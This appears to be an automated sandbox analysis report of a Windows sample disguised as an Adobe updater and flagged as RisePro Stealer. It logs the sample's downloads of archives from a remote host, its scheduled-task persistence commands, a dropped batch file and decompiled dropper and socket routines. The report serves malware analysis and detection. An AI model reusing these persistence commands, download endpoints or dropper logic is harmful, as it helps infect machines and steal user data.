                                    Jul 24, 2024 23:02:23.211795092 CEST288OUTGET /cj//k3.rar HTTP/1.1
                                    Accept: */*
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: ddos.dnsnb8.net:799
                                    Connection: Keep-Alive


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.44975244.221.84.1057998120C:\Users\user\AppData\Local\Temp\xRp.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 24, 2024 23:02:26.419012070 CEST288OUTGET /cj//k4.rar HTTP/1.1
                                    Accept: */*
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: ddos.dnsnb8.net:799
                                    Connection: Keep-Alive


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.44975344.221.84.1057998120C:\Users\user\AppData\Local\Temp\xRp.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 24, 2024 23:02:29.901801109 CEST288OUTGET /cj//k5.rar HTTP/1.1
                                    Accept: */*
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: ddos.dnsnb8.net:799
                                    Connection: Keep-Alive


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:17:01:52
                                    Start date:24/07/2024
                                    Path:C:\Users\user\Desktop\AdobeUpdaterV131.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\AdobeUpdaterV131.exe"
                                    Imagebase:0x620000
                                    File size:2'342'912 bytes
                                    MD5 hash:0BFB030DCBF461F2C76087E4B9856836
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:false

                                    Target ID:1
                                    Start time:17:01:53
                                    Start date:24/07/2024
                                    Path:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    Imagebase:0x4e0000
                                    File size:15'872 bytes
                                    MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:2
                                    Start time:17:01:58
                                    Start date:24/07/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                    Imagebase:0xa10000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:3
                                    Start time:17:01:58
                                    Start date:24/07/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:17:01:58
                                    Start date:24/07/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                    Imagebase:0xa10000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:17:01:58
                                    Start date:24/07/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:17:01:58
                                    Start date:24/07/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 1776
                                    Imagebase:0x8f0000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:9
                                    Start time:17:02:00
                                    Start date:24/07/2024
                                    Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                    Imagebase:0xab0000
                                    File size:2'342'912 bytes
                                    MD5 hash:0BFB030DCBF461F2C76087E4B9856836
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    Reputation:low
                                    Has exited:false

                                    Target ID:10
                                    Start time:17:02:00
                                    Start date:24/07/2024
                                    Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                    Imagebase:0xab0000
                                    File size:2'342'912 bytes
                                    MD5 hash:0BFB030DCBF461F2C76087E4B9856836
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000A.00000002.4127703403.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:false

                                    Target ID:12
                                    Start time:17:02:08
                                    Start date:24/07/2024
                                    Path:C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                    Imagebase:0x5c0000
                                    File size:2'342'912 bytes
                                    MD5 hash:0BFB030DCBF461F2C76087E4B9856836
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    Reputation:low
                                    Has exited:false

                                    Target ID:14
                                    Start time:17:02:16
                                    Start date:24/07/2024
                                    Path:C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                    Imagebase:0x5c0000
                                    File size:2'342'912 bytes
                                    MD5 hash:0BFB030DCBF461F2C76087E4B9856836
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:false

                                    Target ID:15
                                    Start time:17:02:16
                                    Start date:24/07/2024
                                    Path:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Local\Temp\xRp.exe
                                    Imagebase:0xe30000
                                    File size:15'872 bytes
                                    MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:19
                                    Start time:17:02:32
                                    Start date:24/07/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\0be11806.bat" "
                                    Imagebase:0x240000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:20
                                    Start time:17:02:33
                                    Start date:24/07/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:1.8%
                                      Dynamic/Decrypted Code Coverage:5.3%
                                      Signature Coverage:16.7%
                                      Total number of Nodes:114
                                      Total number of Limit Nodes:16
                                      execution_graph 24082 634560 GetPEB RtlAllocateHeap std::locale::_Setgloballocale 24084 622540 RtlAllocateHeap RtlAllocateHeap std::locale::_Locimp::_Locimp 24085 634540 GetSystemTimePreciseAsFileTime __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __Xtime_get_ticks 24096 639bc0 6 API calls 3 library calls 23934 705e56 23935 705e69 ___std_exception_copy 23934->23935 23938 705bad 23935->23938 23937 705e7e ___std_exception_copy 23939 705bb9 std::locale::_Setgloballocale 23938->23939 23941 705bbf ___std_exception_copy 23939->23941 23942 705d30 23939->23942 23941->23937 23943 705d43 23942->23943 23944 705d56 23942->23944 23943->23941 23951 705c57 23944->23951 23946 705e07 23946->23941 23947 705d79 23947->23946 23955 7022f1 23947->23955 23952 705c68 23951->23952 23954 705cc0 23951->23954 23952->23954 23962 70ae5d SetFilePointerEx ___std_exception_copy 23952->23962 23954->23947 23956 702331 23955->23956 23957 70230a 23955->23957 23959 70ae9d 23956->23959 23957->23956 23963 7120ab 23957->23963 23984 70ad7c 23959->23984 23961 70aeb6 23961->23946 23962->23954 23964 7120b7 std::locale::_Setgloballocale 23963->23964 23966 7120bf ___std_exception_copy 23964->23966 23967 7121bc 23964->23967 23966->23956 23968 7121e4 23967->23968 23977 7121e8 ___std_exception_copy 23967->23977 23969 712261 23968->23969 23970 70ae9d SetFilePointerEx 23968->23970 23968->23977 23978 711d01 23969->23978 23970->23969 23973 7122c0 23975 712329 WriteFile 23973->23975 23973->23977 23974 712279 23974->23977 23982 7118d2 RtlAllocateHeap std::_Locinfo::_Locinfo_ctor _ValidateLocalCookies std::locale::_Locimp::_Locimp 23974->23982 23975->23977 23977->23966 23979 711d13 23978->23979 23981 711d41 23979->23981 23983 706a30 RtlAllocateHeap std::_Locinfo::_Locinfo_ctor ___std_exception_copy 23979->23983 23981->23973 23981->23974 23982->23977 23983->23981 23985 70ad8e 23984->23985 23986 70adaa SetFilePointerEx 23985->23986 23987 70ad96 23985->23987 23986->23987 23987->23961 24024 6879d0 24025 687a17 24024->24025 24028 6879e8 std::locale::_Setgloballocale 24024->24028 24029 68acb0 24025->24029 24027 687a2a 24030 68adfc 24029->24030 24031 68acd5 24029->24031 24049 622040 RtlAllocateHeap std::locale::_Setgloballocale 24030->24049 24034 68ad43 24031->24034 24035 68ad36 24031->24035 24037 68acea 24031->24037 24033 68ae01 24050 621fa0 RtlAllocateHeap Concurrency::cancel_current_task ___std_exception_copy 24033->24050 24039 6fbfb1 std::_Facet_Register RtlAllocateHeap 24034->24039 24040 68acfa std::locale::_Locimp::_Locimp std::locale::_Setgloballocale 24034->24040 24035->24033 24035->24037 24041 6fbfb1 24037->24041 24039->24040 24040->24027 24043 6fbfb6 std::_Facet_Register 24041->24043 24044 6fbfd0 24043->24044 24046 621fa0 Concurrency::cancel_current_task 24043->24046 24051 70ac4c 24043->24051 24044->24040 24045 6fbfdc 24045->24045 24046->24045 24055 6fd371 RtlAllocateHeap __freea ___std_exception_copy 24046->24055 24048 621fe3 24048->24040 24049->24033 24050->24040 24054 713b4d __Getctype std::_Facet_Register 24051->24054 24052 713b76 RtlAllocateHeap 24053 713b89 __dosmaperr 24052->24053 24052->24054 24053->24043 24054->24052 24054->24053 24055->24048 24056 bc0000 24058 bc0044 GetPEB 24056->24058 24059 bc0077 CreateFileA 24058->24059 24061 bc0265 24059->24061 24062 bc022d 24059->24062 24063 bc0246 WriteFile 24062->24063 24064 bc0244 24062->24064 24065 bc0255 FindCloseChangeNotification WinExec 24063->24065 24064->24065 24065->24061 24067 4f1074f 24068 4f10767 GetCurrentHwProfileW 24067->24068 24069 4f10784 24068->24069 23919 63d620 WSAStartup 23920 63d658 23919->23920 23923 63d716 23919->23923 23921 63d6e4 socket 23920->23921 23920->23923 23922 63d6fa connect 23921->23922 23921->23923 23922->23923 23924 63d70c closesocket 23922->23924 23924->23921 23924->23923 24088 63db20 RtlAllocateHeap SetFilePointerEx FindCloseChangeNotification WriteFile RtlAllocateHeap 24089 628b00 RtlAllocateHeap ___std_exception_copy 23991 4f1041a GetCurrentHwProfileW GetCurrentHwProfileW GetCurrentHwProfileW 24075 4f10483 GetCurrentHwProfileW GetCurrentHwProfileW GetCurrentHwProfileW 23995 4f10582 GetCurrentHwProfileW GetCurrentHwProfileW 23998 705908 23999 70591b ___std_exception_copy 23998->23999 24002 7057e3 23999->24002 24001 705927 ___std_exception_copy 24003 7057ef std::locale::_Setgloballocale 24002->24003 24005 7057f9 ___std_exception_copy 24003->24005 24006 70587a 24003->24006 24005->24001 24007 7058aa 24006->24007 24009 705887 __freea ___std_exception_copy 24006->24009 24008 7022f1 3 API calls 24007->24008 24007->24009 24010 7058c2 24008->24010 24009->24005 24012 71175f 24010->24012 24013 711788 24012->24013 24015 711770 ___std_exception_copy 24012->24015 24013->24015 24016 7116ce 24013->24016 24015->24009 24017 7116da std::locale::_Setgloballocale 24016->24017 24019 711719 24017->24019 24020 711832 24017->24020 24019->24015 24022 711842 24020->24022 24021 711848 24021->24019 24022->24021 24023 711886 FindCloseChangeNotification 24022->24023 24023->24021 24081 709e88 SetFilePointerEx WriteFile RtlAllocateHeap ___std_exception_copy

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 bc0044-bc0074 GetPEB 1 bc0077-bc009a 0->1 2 bc009d-bc00a0 1->2 3 bc01ee-bc022b CreateFileA 2->3 4 bc00a6-bc00bc 2->4 21 bc022d-bc0230 3->21 22 bc0265-bc0269 3->22 5 bc00be-bc00c5 4->5 6 bc0110-bc0116 4->6 5->6 10 bc00c7-bc00ce 5->10 8 bc0118-bc011f 6->8 9 bc0129-bc012f 6->9 8->9 11 bc0121-bc0124 8->11 12 bc0148-bc014e 9->12 13 bc0131-bc0138 9->13 10->6 14 bc00d0-bc00d7 10->14 16 bc01bb-bc01c0 11->16 18 bc0167-bc016f 12->18 19 bc0150-bc0157 12->19 13->12 17 bc013a-bc0141 13->17 14->6 20 bc00d9-bc00dd 14->20 24 bc01e0-bc01e9 16->24 25 bc01c2-bc01c5 16->25 17->12 23 bc0143-bc0146 17->23 27 bc0188-bc018e 18->27 28 bc0171-bc0178 18->28 19->18 26 bc0159-bc0160 19->26 20->6 29 bc00df-bc00e3 20->29 34 bc0232-bc0238 21->34 23->16 24->2 25->24 35 bc01c7-bc01ca 25->35 26->18 36 bc0162-bc0165 26->36 32 bc01a7-bc01ad 27->32 33 bc0190-bc0197 27->33 28->27 30 bc017a-bc0181 28->30 29->16 31 bc00e9-bc010b 29->31 30->27 37 bc0183-bc0186 30->37 31->1 32->16 39 bc01af-bc01b6 32->39 33->32 38 bc0199-bc01a0 33->38 40 bc023a-bc0242 34->40 41 bc0246-bc0252 WriteFile 34->41 35->24 42 bc01cc-bc01cf 35->42 36->16 37->16 38->32 44 bc01a2-bc01a5 38->44 39->16 45 bc01b8 39->45 40->34 46 bc0244 40->46 47 bc0255-bc0262 FindCloseChangeNotification WinExec 41->47 42->24 48 bc01d1-bc01d4 42->48 44->16 45->16 46->47 47->22 48->24 49 bc01d6-bc01d9 48->49 49->24 50 bc01db-bc01de 49->50 50->3 50->24
                                      APIs
                                      • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00BC0223
                                      • WriteFile.KERNEL32(00000000,FFFFCD8F,00003E00,?,00000000), ref: 00BC0252
                                      • FindCloseChangeNotification.KERNEL32(00000000), ref: 00BC0256
                                      • WinExec.KERNEL32(?,00000005), ref: 00BC0262
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                      • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul$xRp.exe
                                      • API String ID: 2234911746-2378254480
                                      • Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                      • Instruction ID: e8bd36f115aa899849c8b62be6b843099b28442873e0a4873d501adb9aa5b292
                                      • Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                      • Instruction Fuzzy Hash: 3261E274D2121ADBCF249F94C884BADF7B4FB58715F2982AEE505AA241C3709A81CB91

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 51 63d620-63d652 WSAStartup 52 63d726-63d72f 51->52 53 63d658-63d682 call 627d20 * 2 51->53 58 63d684-63d688 53->58 59 63d68e-63d6d4 53->59 58->52 58->59 61 63d720 59->61 62 63d6d6-63d6dc 59->62 61->52 63 63d734-63d73e 62->63 64 63d6de 62->64 63->61 70 63d740-63d748 63->70 65 63d6e4-63d6f8 socket 64->65 65->61 66 63d6fa-63d70a connect 65->66 68 63d730 66->68 69 63d70c-63d714 closesocket 66->69 68->63 69->65 71 63d716-63d71a 69->71 71->61
                                      APIs
                                      • WSAStartup.WS2_32 ref: 0063D64B
                                      • socket.WS2_32(?,?,?,?,?,?,007550C8,?,?), ref: 0063D6EE
                                      • connect.WS2_32(00000000,?,?,?,?,?,007550C8,?,?), ref: 0063D702
                                      • closesocket.WS2_32(00000000), ref: 0063D70D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                      • Associated: 00000000.00000002.4126850330.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4126912909.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127757484.0000000000756000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.00000000009C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4127836747.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130057771.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130488174.0000000000BBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130533106.0000000000BBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130583463.0000000000BC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.4130630894.0000000000BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_620000_AdobeUpdaterV131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Startupclosesocketconnectsocket
                                      • String ID:
                                      • API String ID: 3098855095-0
                                      • Opcode ID: ca0057f3b823f61217a48d211b3d277889b9d02b506460293c2b691422b7756d
                                      • Instruction ID: 80a101af38c1b492a24baacb72c5f4b17959a65132e35cd08d9e950fa586f592
                                      • Opcode Fuzzy Hash: ca0057f3b823f61217a48d211b3d277889b9d02b506460293c2b691422b7756d
                                      • Instruction Fuzzy Hash: 6231D5715053115BD7209F249C84AAFB7E6FFCA378F101F1AF8E8A22D0D335991486E2
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 04F10767
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 02be77d5f0012411e1f61bb45b8988f9fca6c0d524ad3a21e7801ab8ff17e3b8
                                      • Instruction ID: 06fd8eb81c0e330b4e8d42fe3d4577f51ffb1eceb5dbb4503986610a08eb0dae
                                      • Opcode Fuzzy Hash: 02be77d5f0012411e1f61bb45b8988f9fca6c0d524ad3a21e7801ab8ff17e3b8
                                      • Instruction Fuzzy Hash: 3631E1E734C115BDB11281811B60AF66A6EE79B3707704072F507DAA62FED46ACB3531

                                      Control-flow Graph

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e453fa11d17ab41b692ae4eee573ef7adc277bb6109dfbde1beb91efcbedd238
                                      • Instruction ID: ad09001feb242e9783e2d3894ed928cf086158f57486f215f34c68e17ca28834
                                      • Opcode Fuzzy Hash: e453fa11d17ab41b692ae4eee573ef7adc277bb6109dfbde1beb91efcbedd238
                                      • Instruction Fuzzy Hash: 8F9118E730C215BDB202C5855B64AFA6B6DE7DB730730847BF407C6922FA946ACB6131

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 144 4f10453-4f10455 145 4f10457-4f1047e 144->145 146 4f104b8-4f1053f 144->146 150 4f10493 145->150 151 4f10551-4f1055b call 4f1055c 146->151 150->150 154 4f10546-4f10550 151->154 155 4f1055d-4f10736 call 4f1074f 151->155 154->151 179 4f1073b-4f10779 GetCurrentHwProfileW 155->179 181 4f10784-4f10a44 call 4f10a46 179->181
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4025c7b28cd821f5897860fcd44a481fbe04768f51f7e844b118d01865b64332
                                      • Instruction ID: 43bed273ed5879c9d4bc6965fe30ce56016ed37adb1251e99ea6aa4cd3d49601
                                      • Opcode Fuzzy Hash: 4025c7b28cd821f5897860fcd44a481fbe04768f51f7e844b118d01865b64332
                                      • Instruction Fuzzy Hash: 9881C2EB30C115BDB102C1852B64AFA676EE7DB7307308437F407D6922FA946ACB6531

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 215 4f104a2-4f1053f 219 4f10551-4f1055b call 4f1055c 215->219 222 4f10546-4f10550 219->222 223 4f1055d-4f10736 call 4f1074f 219->223 222->219 247 4f1073b-4f10779 GetCurrentHwProfileW 223->247 249 4f10784-4f10a44 call 4f10a46 247->249
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4f10000_AdobeUpdaterV131.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 25bcc2b2cd6a337d2f0ae05da2cf93b40f30fe4197d0cbf4eb19f7b7d0fa1ecb
                                      • Instruction ID: 55af7d99458098372131bc9f2cd96c84792213869986ef50a7dbd945f170b580
                                      • Opcode Fuzzy Hash: 25bcc2b2cd6a337d2f0ae05da2cf93b40f30fe4197d0cbf4eb19f7b7d0fa1ecb
                                      • Instruction Fuzzy Hash: 9181B0EB20C115BDB102C1856B60AFA676EE7DA7307308437F407D6962FA946ACB6531

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 349 4f10518-4f1053f 352 4f10551-4f1055b call 4f1055c 349->352 355 4f10546-4f10550 352->355 356 4f1055d-4f10736 call 4f1074f 352->356 355->352 380 4f1073b-4f10779 GetCurrentHwProfileW 356->380 382 4f10784-4f10a44 call 4f10a46 380->382
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.4135799516.0000000004F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
